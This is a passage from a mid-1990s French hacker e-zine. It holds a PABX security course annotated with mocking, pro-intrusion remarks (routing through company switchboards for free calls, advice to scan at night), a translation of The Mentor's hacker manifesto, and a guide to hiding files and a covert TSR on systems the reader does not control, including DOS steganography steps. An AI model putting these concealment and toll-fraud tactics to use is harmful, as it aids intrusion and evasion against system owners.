  462.       différé rétroactif.... tout ce qu'on veut c'est VOTRE SYSTEME !! ;) ]
  463.    E) Le sabotage des systèmes [ ya que les burnes qui font ca ! ]
  464.    F) Le pirate sportif [ ouais !!!!! ca c'est kewl ! ]
  465.  
  466.    A) detournement d'une ligne pour téléphoner [ ouais !!!!! Beige Box rules ]
  467.       Objectif: telephoner gratuitement à cout moindre
  468.               [            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^        ]
  469.               [ mais il était raide bourré le mec qui a        ]
  470.               [ écrit cela !!!! hahaha... je suis pete de rire ]
  471.       Ce detournement peut etre volontaire: [ plutot oui! ]
  472.       - programmation volontaire sur un poste ou dans le pabx.
  473.       - appel d'un auxiliaire du PABX, messagerie vocale par exemple,
  474.         pour ressortir vers l'exterieur.
  475.         Pour un appel vers l'etranger, le pirate sera taxé de son
  476.         domicile au PABX piraté.  Ce dernier sera taxé pour la ligne
  477.         établie jusqu'à l'étranger.
  478.       ou involontaire: [ on y croit ! ]
  479.       mauvaise affectation des taxes sur les postes.
  480.       - lors de l'utilisation de la fonction conference
  481.       - transfert
  482.       - renvoi
  483.  
  484.    B) Detournement pour appeler des serveurs minitel:
  485.      le detournement dans ce cas est generalement volontaire [ ouahahahaha ]
  486.      La méthode consiste à appeler le PABX d'une société:
  487.      - obtenir une ligne sur le PABX
  488.      - surnuméroter cette ligne
  489.      - ressortir vers l'exterieur.
  490.      - obtenir la liaison avec un serveur.
  491.  
  492.    C) Ecoute teleph
  493.         [ c'est chiant, je tape pas ces conneries ! ]
  494.  
  495.    D) Le pirate informatique, vol d'information
  496.  
  497.        PIRATE ===> PABX société A
  498.                       ||
  499.                       ||
  500.                       \/
  501.                   Central FT ville 1 =====> Central FT Ville 2
  502.                                                     ||
  503.                                                     ||
  504.                                                     \/
  505.                                            Site informatique piraté.
  506.  
  507.       [ comme ca la trace est remontée plus difficilement ]
  508.  
  509.    E) Le sabotage des systèmes
  510.       [ PFFFF..... ]
  511.  
  512.    F) Le pirate sportif [ La le mec sait ce qu'il dit ! ]
  513.       Objectif du pirate: l'argent n'est pas la motivation principale,
  514.       du moins au départ.
  515.       buts: * se connecter à un max de système
  516.             * penetrer par jeu
  517.             * s'introduire au coeur meme du système par défi
  518.       methode utiliséee:
  519.       * recherche des numéros d'appel
  520.       * recherche de mot de passe
  521.       * contourner les protections
  522.       * acceder aux fonctions interdites
  523.  
  524.       Son but n'est pas de casser. Il peut seulement souhaiter utiliser des
  525.       heures machines ou des données.
  526.       Peu dangereux, il peut le devenir si:  [ jamais vu cela ! ]
  527.       - il donne ses infos à des tiers sans scrupules
  528.       - des société concurrentes
  529.       - il est recruté pour l'argent
  530.  
  531. 4°)
  532.    A) Piratage physique des lignes analogiques
  533.  
  534. FT                         Central FT
  535.                                ||
  536. --------------------           ||
  537.                                \/
  538. Société                       PABX
  539.                                ||
  540.                                \/
  541. --------------------   repartiteur dans la cabine PABX. *
  542.                                ||
  543. Immeuble de la société         ||
  544.                                \/
  545.                         repartiteur général * $
  546.                                ||
  547.                                ||
  548.                                \/
  549.                         sous repartit d'étage * $
  550.                                ||
  551.                                ||
  552.                                \/
  553.                            poste tel . * $
  554.  
  555. [ une * == point de piratage physique possible en analogique ]
  556. [ un $ == point de piratage physique possible en numérique ]
  557.  
  558. Piratage physique des lignes.
  559.         a) methode simple et a peu de frais. Possibilité de se connecter sur
  560.            tous les points du cheminement de la sortie du central au point
  561.            final d'implantation du poste.
  562.         b) Dans le cas d'un raccordement numérique du PABX, il ne sera pas
  563.            possible de se raccorder sur le cheminement du central à la société.
  564.            Un piratage de ce type necessite un equipement d'un cout tres
  565.            dissuasif.
  566.            La partie sensible se situe donc entre le PABX et la prise murale ou
  567.            est connecté le poste analogique. Le pirratage ne pourra etre fait
  568.            qu'a L'INTERIEUR de l'immeuble.
  569.         c) Dans le cas d'une liaison numérique de bout en bout, le piratage à
  570.            peu de frais deviens impossible [Ah ouais? t'veux une contre preuve?]
  571.  
  572.  
  573.    B) Piratage des fonctionnalités du PABX
  574.       Nous avons ici deux types de piratage possible:
  575.         * volontaire avec les fonctionnalités disponible dans le PABX.
  576.         * involontaire : affectation des taxes a un autre poste que le sien
  577.           sans l'avoir voulu.
  578.           Il s'agit le plus souvent de mauvais parametrage lors de la
  579.           programmation ou des erreurs dans le logiciel lors de sa conception.
  580.  
  581.       Exemple concret lié à un bug:
  582.        si l'initiateur d'unee conference avec deux correspondant exterieurs
  583.        raccroche en premier, question:
  584.        - est ce que les deux autres personnes seront coupées
  585.        - Si la réponse est non qui sera taxe?
  586.        Idem dans le cas d'un appel transféré vers l'exterieur.
  587.  
  588.       Les fonctionnalités concernées sont:
  589.         * conference: verifier si les corresp. st coupés qd l'initiateur
  590.           raccroche
  591.         * transfert : lors des transferts interne, verifier si la repartition
  592.           des taxes s'effectue correctement.
  593.         * renvoi: avec un MIC T2 grand confort, il est possible de renvoyer les
  594.           communication vers l'exterieur.
  595.         * recuperation des fonctionnalité d'un poste de direction par un code
  596.           et son mot de passe. Cette fonction permet a partir de n'importe quel
  597.           poste de la société de récupérer le 19 en affectant le ticket de
  598.           taxation au poste directeur.
  599.  
  600.    C) Piratage par telemaintenance.
  601.    [ce qui suit est ma description des schemas:
  602.       Fonction de télémaintenance:
  603.         * Controle de qualité d'une ligne : permet d'appeler n'importe quel
  604.           numéro.
  605.         * Programmation d'un poste fantome puis renvoi. ]
  606.         a) il est possible d'appeler un PABX et de se faire rappeler
  607.            simultanement.  Le but est de contrôler l'établissement de la
  608.            liaison et de mesurer sa qualité:
  609.                 - en affaiblissement
  610.                 - en paradiaphonie
  611.                 - en reverberation
  612.            Au  lieu de se faire rappeler sur le site de contrôle, un
  613.            technicien peut en profiter pour appeler un correspondant à
  614.            l'étranger ou des serveurs minitel.
  615.            Les taxes seront donc affecté au site controlé!
  616.         b) Il est possible par telemaintenance de déclarer par programmation un
  617.            poste dit fantome dans un PABX distant.
  618.            Il existe dans la machine mais il n'est physiquement pas présent sur
  619.            le site.
  620.  
  621.    D) Piratage d'un auxiliaire d'un PABX.
  622.         Ce type de piratage est possible par le biais des options installées
  623.         sur un autocommutateur téléphonique.
  624.         Sont concernés:
  625.                 * serveurs vocaux
  626.                 * messageries vocales
  627.                 * les opérateurs automatiques
  628.  
  629.         Moyen de protection: Sur incident, appel non abouti il est souhaitable
  630.         de réorienter les appels vers la standardiste.  Cette précaution
  631.         empêche un correspondant exterieur de surnuméroter pour rappeler un
  632.         autre poste à travers le PABX.
  633.  
  634.    E) Piratage par une base TSF.
  635.         [ bof, je tape pas ca:
  636.           On passe dans les couloirs de la société avec un téléphone sans fil
  637.           et on essaye d'accrocher une base ! ]
  638.  
  639. 5°)
  640.    A) acces aux locaux:
  641.    [ resumé: - salle PABX fermée
  642.              - acces controlés
  643.              - que des techniciens habilités.
  644.              - mm ch pr la salle d'exploit.
  645.              - gaines techniques fermees
  646.              - cabine de sous repartition controlée et surveillée
  647.              - chemins de cable visibles cerclés et couverts!
  648.    B) protec des infos.
  649.       Enfermé dans des armoires:
  650.       - derniere programmation
  651.       - support annuaire technique
  652.       - la composition des tetes PTT
  653.       - la composition du systeme ne doit pas etre divulgué surtout si des
  654.         auxiliaires sont raccordés derriere le PABX.
  655.  
  656.       Attention:
  657.       Les microordinateurs envoyés en réparation, peuvent contenir des
  658.       informations sensibles:
  659.       - annuaire technique complet
  660.       - annuaire extern
  661.       - liste des numéros abrégés
  662.       - liste des techniciens habilités.
  663.       - liste des mots de passe
  664.       - la taxation contenant tous les numéros appelés.
  665.  
  666.    C) Destruction des supports obsolete:
  667.      [ en bref, on passe tout au  broyeur et DELETE et FORMAT ne sont pas
  668.      effectifs ! ]
  669.  
  670.    D) Sauvegarde
  671.  
  672. 6°) Les moyens de contrôle:
  673.    A) La taxation telephonique:
  674.      [ schéma montrant une imprimante connectée au modem de maintenance du
  675.      PABX avec consoles d'observ du trafic, de taxation et console systeme PABX
  676.      ainsi qu'une  messagerie vocale.
  677.      ]
  678.      Doit permettre un controle sur une periode paramétrable pour les appels
  679.      émis par poste, service, direction.
  680.      * a l'etranger
  681.      * en province
  682.      * en local
  683.  
  684.    B) Observ. du trafic:
  685.         permet de reperer les lignes modem du PABX appelées en dehors des
  686.         heures ouvrables.
  687. [ ***CONCLUSION*** ***IMPORTANTE*** DONC :
  688. SCANNEZ LA NUIT              MAIS ------>  *** UTILISEZ LE JOUR *** ]
  689.         Tres utile en cas de piratage du PABX pour determiner les faisceaux
  690.         utilisés pour entrer et ressortir a travers le PABX et ses auxiliaires.
  691.  
  692.         Afin de faciliter ce repérage, il est possible d'extraire les appels
  693.         ressortantss dans la meme minute que les appels quii arrivent sur le
  694.         PABX.
  695.         Cette possibilité facilite grandement l'analyse si des temporisations
  696.         n'ont pas été programées.
  697.  
  698.         Les tickets des appels émis par un PABX et non compris par le PC
  699.         d'observation de trafic doivent etre stockés pour traitement ultérieur.
  700.  
  701.    Ne pas oublier que la puissance de traitement d'un systeme périphérique de
  702.    taxation ou d'observation téléphonique est liée à la richesse des
  703.    informations délivrées par le PABX d'un constructeur.
  704.  
  705.    Exemple: si le PABX n'a que des compteurs pour les emissions et les
  706.    receptions d'appels, il sera impossible de faire un horodatage et de
  707.    determiner les heures de pointes.
  708.  
  709.                                       --
  710.                            Fin de la première partie
  711.                                       --
  712.  
  713.                                -%!% N0 Way %!%-
  714.  
  715.                       Volume I,   Numéro 3,  Partie 3.5
  716.  
  717.  
  718.                         \/\La Conscience d'un hacker/\/
  719.  
  720.                                       par
  721.  
  722.                                 +++The Mentor+++
  723.  
  724.                            Ecrit le 8 Janvier 1986
  725.  
  726.                   Traduit par NeurAlien le 8 septembre 1994.
  727. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  728.         Un autre s'est fait prendre aujourd'hui, c'est partout dans les
  729. journaux. "Scandale: Un adolescent arreté pour crime informatique",
  730. "Arrestation d'un 'hacker' après le piratage d'une banque"...
  731.         Satanés gosses, tous les mêmes.
  732.  
  733.         Mais avez vous, dans votre psychologie en trois piece et votre profil
  734. technocratique de 1950, un jour pensé à regarder le monde derriere les yeux
  735. d'un hacker?  Ne vous etes vous jamais demandé ce qui l'avait fait agir,
  736. quelles forces l'avaient modelé?
  737.         Je suis un hacker, entrez dans mon monde...
  738.         Le mien est un monde qui commence avec l'école... Je suis plus
  739. astucieux que la pluspart des autres enfants, les conneries qu'ils m'apprennent
  740. me lassent...
  741.  
  742.         Je suis au collège ou au lycée.  J'ai écouté les professeurs expliquer
  743. pour la quizieme fois comment réduire une fraction.  Je l'ai compris.
  744. "Non Mme Dubois, je ne peux pas montrer mon travail.  Je l'ai fait dans ma tête"
  745.         Satané gosses. Il l'a certainnement copié. Tous les mêmes.
  746.  
  747.         J'ai fait une découverte aujourd'hui.  J'ai trouvé un ordinateur.
  748. Attends une minute, c'est cool.  Ca fait ce que je veux.  Si ca fait une
  749. erreur, c'est parce que je me suis planté.
  750.         Pas parce qu'il ne m'aime pas...
  751.         Ni parce qu'il se sent menacé par moi...
  752.         Ni parce qu'il pense que je suis petit filoux...
  753.         Ni parce qu'il n'aime pas enseigner et qu'il ne devrait pas être là...
  754.         Satanés gosses. Tout ce qu'il fait c'est jouer. Tous les mêmes.
  755.  
  756.         Et alors c'est arrivé... une porte s'est ouverte sur le monde... Se
  757. précipitant a travers la ligne téléphonique comme de l'héroine dans les veines
  758. d'un accro, une impulsion electronique est envoyée, on recherche un refuge à
  759. l'incompetence quotidienne... un serveur est trouvé.
  760.  
  761.         Vous vous repetez que nous sommes tous pareils... On a été nourri à la
  762. petite cuillere de bouffe pour bébé à l'école quand on avait faim d'un steak...
  763. Les fragments de viande que l'on nous a laissé étaient pré-machés et sans gout.
  764. On a été dominé par des sadiques ou ignoré par des apathiques.  Les seuls qui
  765. avaient des choses à nous apprendre trouvèrent des élèves volontaires, mais
  766. ceux ci sont comme des gouttes dans le desert.
  767.  
  768.         C'est notre monde maintenant... Le monde de l'éléctron et de
  769. l'interrupteur, la beauté du baud.  Nous utilisons un service déja existant,
  770. sans payer ce qui pourrait être bon marché si ce n'était pas la propriété
  771. de gloutons profiteurs, et vous nous appelez criminels.  Nous explorons... et
  772. vous nous appelez criminels.  Nous recherchons la connaissance... et vous nous
  773. appelez criminels.  Nous existons sans couleur de peau, sans nationalité, sans
  774. dogme religieux... et vous nous appelez criminels.
  775. Vous construisez des bombes atomiques, vous financez les guerres,
  776. vous ne punissez pas les patrons de la mafia aux riches avocats,
  777. vous assassinez et trichez, vous manipulez et nous mentez en essayant de nous
  778. faire croire que c'est pour notre propre bien être, et nous sommes encore des
  779. criminels.
  780.  
  781.         Oui, je suis un criminel.  Mon crime est celui de la curiosité.  Mon
  782. crime est celui de juger les gens par ce qu'ils pensent et dise, pas selon leur
  783. apparence.
  784. Mon crime est de vous surpasser, quelque chose que vous ne me pardonnerez
  785. jamais.
  786.  
  787.         Je suis un hacker, et ceci est mon manifeste.  Vous pouvez arreter cet
  788. individu, mais vous ne pouvez pas tous nous arreter...
  789. après tout, nous sommes tous les mêmes.
  790.  
  791.                                 +++The Mentor+++
  792.  
  793.  
  794.                                -%!% N0 Way %!%-
  795.  
  796.                       Volume I,   Numéro 3,  Partie 3.6
  797.  
  798.                      ╔════════════════════════════════╗
  799.                      ║ Data dissimulation techniques: ║
  800.                      ║ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ║
  801.                      ║      Hiding your data in       ║
  802.                      ║  a Restricted and Patrolled    ║
  803.                      ║    District of CyberSpace.     ║
  804.                      ║ ------------------------------ ║
  805.                      ║      Written by  Arscene       ║
  806.                      ║           for N0Way            ║
  807.                      ╚════════════════════════════════╝
  808.  
  809.  I) Intro & Thanks & Disclaimer
  810.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  811.   Dans la, heum, discipline, qui est la notre il arrive souvent que
  812.  nous ayions a dissimuler une certaine quantité de Data sur un
  813.  systeme que nous visitions, ou qui possede des resources auquelles
  814.  nous n'avons pas access, et generalement dont il ne profite pas
  815.  pleinement.  Il nous arrive aussi d'avoir a communiquer dans un
  816.  environnement peu sur et controlé par des individus paranoiaques et
  817.  megalomanes.  C'est pour ces deux raisons que j'ai ecrit ce file.
  818.  Il s'adresse a tous, et j'espere qu'il vous sera utile (Que j'ai
  819.  pas passé des nuits blanches pour rien, quoi).
  820.   Remerciements/greets/good_karma a NeurAlien, Omega et O'Connell
  821.  pour etre qui ils sont.
  822.   GreetZ a tous les lecteurs de N0Way. N'oubliez pas que l'avenir;
  823.  c'est vous.  Et que vous etes defini par vos actions, et non votre
  824.  passé.
  825.   This file also dedicated to Mr Toubon for his open mindedness and
  826.  his efforts towards harmonious internationalisation.  Also to Mr
  827.  Pasqua for his efforts to preserve peace at all cost and his
  828.  unswaying belief in the principles of democracy, justice, and
  829.  freedom.
  830.   Bon, je suis sur que NeurAlien vas nous faire une superbe
  831.  Disclaimer    qui couvre tout, mais j'aimerais rajouter la mienne:
  832.   
  833.   De ce texte complet, je n'ais ecrit et pensé que ces trois lignes.
  834.   Dans ces trois lignes, une et une seule est un mensonge.
  835.   Avant-hier, j'ai pensé voir un OVNI.
  836.                                     
  837.  Faites moi du mail sur ce que vous pensez de ce Disclaimer, et vos
  838.  idées pour faire mieux.
  839.  
  840.  II) Cacher un file dans le OS
  841.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  842.   Bon, d'abord les principes de base. Si vous etes sur un systeme 'étranger'
  843.  (dont vous n'avez pas le controle complet), il arrive que vous vouliez
  844.  posseder quelques files (fichiers), sans que les autres users, ou meme le
  845.  Supervisor, ne le sache. Il faut donc les cacher.
  846.  
  847.  1) Les attributs de systeme:
  848.  
  849.   La, on pense tout de suite aux attributs speciaux de fichiers (Caché ou
  850.  Systeme, sous MS-DOS). Mais, si ces attributs font partie du systeme ils
  851.  sont tres connus, et bon nombre de programmes peuvent les modifier, ou les
  852.  ignorent tout simplement. Ils servent en general a proteger l'utilisateur
  853.  de lui meme, en evitant par exemple qu'il n'efface des fichiers systemes.
  854.  Par exemple: Crééz un fichier DOS puis faites soit ATTRIB +H ou ATTRIB +S
  855.  dessus, et allez dans le file manager de Windows (Vous ne l'utilisez peut
  856.  etre pas souvent, mais le proprietaire de systeme si). Allez sur le
  857.  drive/dir ou est votre fichier caché. Normalement vous ne le voyez pas.
  858.  Vous ne pouvez pas non plus l'effacer.
  859.   Maintenant allez dans Affichage/Par type de fichiers. Cliquez sur
  860.  'Visualiser les fichiers systemes/cachés'. En revenant a l'ecran principal
  861.  vous devriez voir votre fichier, mais en plus il aura un point
  862.  d'exclamation rouge a coté de son nom, et il n'est plus tres discret
  863.  maintenant.
  864.   De meme, si vous avez LapLink 3 (recommandé), vous avez surement remarqué
  865.  qu'il affiche les fichiers normaux en gris-DOS standard, mais les fichiers
  866.  cachés ou systemes sont affichés en Blanc (High intensity) avec un '*'
  867.  devant leur nom. Ideal pour se faire reperer.
  868.  
  869.  2) Le choix:
  870.  
  871.   Les attributs du systeme peuvent donc soit bien dissimuler le fichier,
  872.  soit le rendre tres evident. Il y a donc un choix a faire. Pensez vous que
  873.  la/les personnes a qui vous voulez dissimuler le fichier seront assez
  874.  intelligentes pour cliquer sur le bouton ? (C'est une vraie question, pas
  875.  une question rhetorique). La reponse par default, dans mon cas, est Oui. Je
  876.  prefere ne pas cacher mes files et utiliser d'autres options.
  877.  
  878.  3) Tout en haut de l'arbre:
  879.  
  880.   Comme un object caché dans un arbre, un file caché profond en haut de
  881.  l'arbre est plus dur a reperer que si vous le laissiez dans la racine. En
  882.  regle generale il ne faut rien mettre dans la racine, et preferer au moins
  883.  2 niveaux de profondeure. Voici un exemple:
  884.   Pour une raison qui m'est propre je devais charger un TSR sur une PC en
  885.  reseau Novell. Il fallait une ligne dans l'autoexec, et un endroit ou
  886.  mettre le fichier sur le disque dur. Cette machine etait frequement utilisé
  887.  par le SUPERVISOR (on se demande ce que faisait le TSR, hum ;-)) et
  888.  l'AUTOEXEC.BAT lançait un antivirus resident qui scannait la racine
  889.  de C: au demarage.  Les noms des fichiers sur C:\ s'affichant
  890.  pendant le scan.  J'ai donc mis le fichier dans C:\DOS.  Ainsi il
  891.  n'etait pas remarqué par le scan, et la ligne dans l'autoexec ne
  892.  paraissait pas suspecte car l'autoexec.bat sert justement a charger
  893.  des programmes du repertoire DOS.  Cet exemple me permet d'ajouter
  894.  qu'il faut toujours essayer de placer un fichier parmi ses
  895.  semblables, du moins exterieurement (j'y reviendrait en 4).
  896.   
  897.   Un autre exemple: J'avais un fichier de +4Mo a dissimuler sur un poste en
  898.  local, le temps que je puisse amener de quoi le backup et le ramener chez
  899.  moi. Je l'ai mis dans C:\EXCEL\EXEMPLES\AUTRE, il y a de cela au moins 6
  900.  mois. A dernière verification il y etait encore. Peu de gens s'aventurent
  901.  haut dans un arbre, surtout s'il parait conforme. Une petite note quand
  902.  meme: N'en faites pas trop. Il ne faut pas que le chemin soit sensiblement
  903.  plus long que la moyenne sur le disque, car un backup ou un TREE pourrait
  904.  le reperer aisement.
  905.   Pour clore cette partie il me faut reserver une mention speciale a nos
  906.  amis de chez M$, et plus particulierement le repertoire WINDOWS\SYSTEM.
  907.  Celui-ci existe sur la grande majorité des machines, peut etre meme la
  908.  votre. Combien d'entre vous savent combien de fichiers ils ont dans ce
  909.  repertoire, et ce que fait chaque fichier ? En gros, on peut TOUT fourrer
  910.  dans ce repertoire, si ce n'est ni trop gros ni trop voyant. Personne ne
  911.  s'en rendra compte.
  912.  
  913.  4) "A rose by any other name would smell as sweet"
  914.  
  915.   Pour ceux qui n'auraient pas compris ma citation de Shakespeare, Juliet
  916.  dit qu'une rose, meme si on changait son nom, aurait quand meme la (bonne)
  917.  odeure d'une rose. Mais un file ne sent pas, d'ou l'interet de changer son
  918.  nom pour le dissimuler (Logique suspecte).
  919.   Un nom qui fasse temporaire ( *.$$$, ~*.TMP, etc) est assez bon pour une
  920.  courte periode, mais un sys/user intelligent risque de l'effacer au bout
  921.  d'un moment. Un nom inventé est bon, de preference un nom qui ne soit pas
  922.  comprehensible, de sorte a faire fichier systeme. Explication: En general
  923.  un user va essayer de lire un file du nom README.NOW, il lira probablement
  924.  le file WHATEVER.TXT, peut etre pas WHATEVER.DAT et surement pas PR4)Q567
  925.  sans extension.
  926.   Un nom de ce type est bon, mais ce n'est pas ce qui se fait de mieux. Le
  927.  nom devrait s'integrer a son environnement. Regardez se qui existe deja
  928.  dans les alentours. Par exemple j'ai mis deux fichiers (HACK et VIEW pour
  929.  ceux que cela interresse) dans le ROOT d'un drive ou il existait MENU1.OLD
  930.  et MENU2.OLD. Simplement en les appelent MENU3.OLD et MENU4.OLD ils sont
  931.  restes 'invisibles' pendant plus d'un mois (puis je les ais enlevé).
  932.   CONFIG.OLD (ou .CPS ou .B~K) et la meme chose pour AUTOEXEC font de bon
  933.  depos temporaires. Pour une plus longue echeance essayer TD451.DRV dans
  934.  \WINDOWS\SYSTEM ou un truc du genre.
  935.  
  936.  5) Conclusion (de part I)
  937.  
  938.   Petite conclusion rapide. Les trois regles d'or pour planquer un file
  939.  sont:
  940.   - Le mettre ou en utilisation normale un user ne le verait meme pas.
  941.   - Que son nom s'integre a son environnement.
  942.   - Choisir un nom/extension que l'user ne penserait pas, en marche normale
  943.   a lire/ouvrir/lancer/etc.
  944.  Et en, heu, regle d'argent:
  945.   - Autant que possible, le crypter.
  946.  
  947.  6) PS et PPS
  948.  
  949.  PS: Si vous cryptez le file il ne faut PAS que cela soit apparent, par
  950.  exemple PGP met '----- BEGIN PGP MESSAGE -----' (ou un truc du
  951.  genre) au debut de ce qu'il crypte.  Si un sys/user voit cela il
  952.  risque fort de le delete immediatement.
  953.  
  954.  PPS: Dans la serie Revenge/Annoy si vous voulez simplement irriter le
  955.  sys/user dans ce cas faites tout le contraire de ce que dit ce file. Un
  956.  fichier de 8Mo du nom de SECRET.COD, OCCULT.SEX, VIRUS.XXX dans le ROOT,
  957.  completement crypté (du garbage au hasard) avec en premiere ligne 'JF-DES
  958.  Crypted block. Checksum: 834A4C12' risque grandement d'amuser un sys/user,
  959.  surtout si il en retrouve des variantes subtiles partout sur son disque :-)
  960.  
  961.  III) Cacher un file dans un autre
  962.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  963.   Une technique encore plus subtile, et de par la meme meilleure, est de
  964.  cacher un file directement dans un autre. Le file 'host' devrait etre un
  965.  fichier anodin, qui a droit de residence legitime sur le systeme. Cela peut
  966.  permettre de dissimuler encore plus efficacement un file sur un systeme,
  967.  mais egalement (et probablement encore plus important) est que cette
  968.  technique permet de créer un chemin sur entre 2 personnes a travers une
  969.  zone non-sure du CyberSpace. Exemple: Dans les interets de la securité
  970.  nationale et du peuple, un gouvernement debonnaire a rendu l'echange
  971.  d'informations cryptés illégales.  Non respet de cette loi vous
  972.  fera deporté en Antarctique.  Mais, CyberPunk que vous etes, vous
  973.  devez envoyer vos C0deZ a quelqu'un.  Vous ecrivez votre message,
  974.  le cryptez.  Puis vous digitalisez une photo de votre maison,
  975.  inserez votre file dans la photo (en remplaçant le gresillement
  976.  (l'aglomeration urbaine derrière chez vous en low-res) du fond par
  977.  votre file crypté), puis vous U/L le tout a votre ami.  Ce que je
  978.  viens de decrire est fiction, mais montre un peu les possibilités
  979.  de cette technique, qui commence d'ailleurs a faire du bruit
  980.  (Remarquez l'allusion).
  981. [ OUh ouh Arscene, ce n'est plus Fiction !!! Cypherella des cypherpunks l'a
  982. fait sur Mac deja et j'ai eu des echos comme quoi la meme chose existe sur PC
  983. et Unix pour intégrer du code PGP a du JPEG et du GIF. ++NeurAlien]
  984.  
  985.  1) Un peu de pratique
  986.  
  987.   Voici quelque endroits, sur PC, ou un file pourrait etre caché:
  988.  
  989.   - Dans un TXT: Un fichier TXT se finit par un CR, LF (qui font aller a la
  990.  ligne) et un marqueur de fin de fichier. En Hex, cela donne 0D 0A 1A.
  991.  Ajoutez ces 3 bytes a la fin d'un fichier TXT, puis ajoutez du text après,
  992.  et ni TYPE ni EDIT n'afficheront ce nouveau text. Voici en detail:
  993.  
  994.   COPY CON FIRST.TXT
  995.    >Essai de text XXX^Z
  996.    (1 fichier ecrit)
  997.    [Editez ce fichier et remplacez les 3 X respectivement par 0D, 0A et 1A]
  998.   COPY CON TWO.TXT
  999.   >Text secret^Z
  1000.    (1 fichier ecrit)
  1001.   COPY FIRST.TXT + TWO.TXT /b FINAL.TXT
  1002.   TYPE FINAL.TXT
  1003.    Essai de text
  1004.  
  1005.   Si vous ouvrez a nouveau FINAL.TXT dans votre editeur Hex vous verrez les
  1006.  2 lignes. Cette technique n'est pas terrible en pratique (car un bon
  1007.  editeur ASCII ou traitement de texte fera apparaitre tout le texte) mais
  1008.  sert bien de demonstration
  1009.  
  1010.   - Dans un EXE: Tout EXE commence par un header d'une longeure variable de
  1011.  bytes, et avec l'utilisation rependue de compresseurs d'EXE le seul vrai
  1012.  moyen de voir si un header est valide est de lancer l'EXE. Pour inclure ce
  1013.  que vous voulez dans le header il suffit d'allonger sa taille. Cette taille
  1014.  s'exprime en paragraphes (16 bytes = 1 pararaph), est un WORD et ce trouve
  1015.  au 5ème WORD du fichier (10ème et 11ème byte). Après avoir ajouté la
  1016.  longeure de votre fichier / 16 ( + un peu pour etre sur ) au header il
  1017.  suffit d'inclure votre fichier a la fin de ce header. L'EXE devrait
  1018.  toujours fonctionner sans probleme. Si vous compez automatiser l'operation,
  1019.  il est bon d'inclure aussi la longeure du fichier en bytes et l'ancienne
  1020.  longueure du header.
  1021.  
  1022.   - Dans un GIF: Un GIF est formé de plusieures blocs. Un bloc commence par
  1023.  soit par un ',', (une virgule quoi), si c'est une image, par ';' si c'est
  1024.  la fin du fichier (bon, ok, c'est pas vraiment un bloc), ou par '!' si
  1025.  c'est une extension. La, cela devient interressant. Une extension peut
  1026.  etre n'importe quoi, un commentaire par exemple, en general un
  1027.  viewer de GIF reconnait certaines extension, et ignore tout simplement les
  1028.  valeures qu'il ne connait pas. D'ou l'idée de se faire un bloc 'Secret
  1029.  info'.
  1030.  Bon, comme aucun d'entre vous ne paye sa comm pour D/L N0Way, je peut sans
  1031.  crainte vous balancer ces extraits des DOC officielles:
  1032.   La première concerne les extensions GIF en general:
  1033.   
  1034.    GIF Extension Blocks are packaged in a manner similar to that  used
  1035.    by the raster data though not compressed.  The basic structure is:
  1036.          7 6 5 4 3 2 1 0  Byte #
  1037.         +---------------+
  1038.         |0 0 1 0 0 0 0 1|  1       '!' - GIF Extension Block Introducer
  1039.         +---------------+
  1040.         | function code |  2       Extension function code (0 to 255)
  1041.         +---------------+    ---+
  1042.         |  byte count   |       |
  1043.         +---------------+       |
  1044.         :               :       +-- Repeated as many times as necessary
  1045.         |func data bytes|       |
  1046.         :               :       |
  1047.         +---------------+    ---+
  1048.         . . .       . . .
  1049.         +---------------+
  1050.         |0 0 0 0 0 0 0 0|       zero byte count (terminates block)
  1051.         +---------------+
  1052.         A GIF Extension Block may immediately preceed any Image  Descriptor
  1053.    or occur before the GIF Terminator.
  1054.         All GIF decoders must be able to recognize  the  existence  of  GIF
  1055.    Extension  Blocks  and  read past them if unable to process the function
  1056.    code.  
  1057.  
  1058.   La seconde concerne le bloc d'extension particulier qui nous
  1059. interresse:
  1060.  
  1061. 26. Application Extension.
  1062.  
  1063.       a. Description. The Application Extension contains application-specific
  1064.       information; it conforms with the extension block syntax, as described
  1065.       below, and its block label is 0xFF.
  1066.  
  1067.       b. Required Version.  89a.
  1068.  
  1069.       c. Syntax.
  1070.  
  1071.       7 6 5 4 3 2 1 0        Field Name                    Type
  1072.      +---------------+
  1073.   0  |               |       Extension Introducer ['!']    Byte
  1074.      +---------------+
  1075.   1  |               |       Extension Label [0xFF]        Byte
  1076.      +---------------+
  1077.      +---------------+
  1078.   0  |               |       Block Size [11]               Byte
  1079.      +---------------+
  1080.   1  |               |
  1081.      +-             -+
  1082.   2  |               |
  1083.      +-             -+
  1084.   3  |               |       Application Identifier        8 Bytes
  1085.      +-             -+
  1086.   4  |               |
  1087.      +-             -+
  1088.   5  |               |
  1089.      +-             -+
  1090.   6  |               |
  1091.      +-             -+
  1092.   7  |               |
  1093.      +-             -+
  1094.   8  |               |
  1095.      +---------------+
  1096.   9  |               |
  1097.      +-             -+
  1098.  10  |               |       Appl. Authentication Code     3 Bytes
  1099.      +-             -+
  1100.  11  |               |
  1101.      +---------------+
  1102.  
  1103.      +===============+
  1104.      |               |
  1105.      |               |       Application Data              Data Sub-blocks
  1106.      |               |
  1107.      |               |
  1108.      +===============+
  1109.  
  1110.      +---------------+
  1111.   0  |               |       Block Terminator              Byte
  1112.      +---------------+
  1113.  
  1114.             i) Extension Introducer - Defines this block as an extension. This
  1115.             field contains the fixed value 0x21 ['!' en ASCII].
  1116.  
  1117.             ii) Application Extension Label - Identifies the block as an
  1118.             Application Extension. This field contains the fixed value 0xFF.
  1119.  
  1120.             iii) Block Size - Number of bytes in this extension block,
  1121.             following the Block Size field, up to but not including the
  1122.             beginning of the Application Data. This field contains the fixed
  1123.             value 11.
  1124.  
  1125.             iv) Application Identifier - Sequence of eight printable ASCII
  1126.             characters used to identify the application owning the Application
  1127.             Extension.
  1128.  
  1129.             v) Application Authentication Code - Sequence of three bytes used
  1130.             to authenticate the Application Identifier. An Application program
  1131.             may use an algorithm to compute a binary code that uniquely
  1132.             identifies it as the application owning the Application Extension.
  1133.  
  1134.  
  1135.       d. Extensions and Scope. This block does not have scope. This block
  1136.       cannot be modified by any extension.
  1137.  
  1138.       e. Recommendation. None.
  1139.    
  1140.   Bon, j'espere que tout le monde a compris :-)    
